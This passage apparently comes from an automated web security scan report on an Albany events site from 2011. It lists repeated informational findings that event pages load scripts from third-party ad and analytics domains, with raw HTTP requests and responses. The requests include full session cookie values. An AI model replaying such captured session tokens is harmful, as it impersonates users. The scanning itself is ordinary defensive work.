Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 360
ETag: "38bd9e5de09ad45e8a1cf768f5953a0e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:17 GMT; HttpOnly
Content-Length: 47519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.162. http://events.cbs6albany.com/albany-ny/events/show/154912025-mike-epps-and-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/154912025-mike-epps-and-friends

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/154912025-mike-epps-and-friends HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 173
ETag: "c740a1825c985b49ed3597f2feda837d"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:15 GMT; HttpOnly
Content-Length: 59399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.163. http://events.cbs6albany.com/albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:16 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 204
ETag: "e8b0dacf547ea20331b1714856aca8d2"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:16 GMT; HttpOnly
Content-Length: 50228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.164. http://events.cbs6albany.com/albany-ny/events/show/155300665-celtic-woman previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/155300665-celtic-woman

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/155300665-celtic-woman HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 109
ETag: "9521f455c418d6da31578b0847f18a57"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:11 GMT; HttpOnly
Content-Length: 59374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.165. http://events.cbs6albany.com/albany-ny/events/show/161856385-a-very-special-acoustic-electric-evening-with-trey-anastasio-tab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/161856385-a-very-special-acoustic-electric-evening-with-trey-anastasio-tab

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/161856385-a-very-special-acoustic-electric-evening-with-trey-anastasio-tab HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 136
ETag: "ad2d22883a82e2b5a9d596e15b187e0f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:31 GMT; HttpOnly
Content-Length: 59757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.166. http://events.cbs6albany.com/albany-ny/events/show/162869785-a-conversation-with-steve-martin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/162869785-a-conversation-with-steve-martin

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/162869785-a-conversation-with-steve-martin HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 344
ETag: "4c5b52a83abb45550584fcfcf102d749"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:31 GMT; HttpOnly
Content-Length: 56698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.167. http://events.cbs6albany.com/albany-ny/events/show/163514785-2011-valentine-expo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/163514785-2011-valentine-expo

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/163514785-2011-valentine-expo HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:31:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 484
ETag: "707372889a4a6e4e8ce0d1d81c386157"
Cache-Control: must-revalidate, private, max-age=0
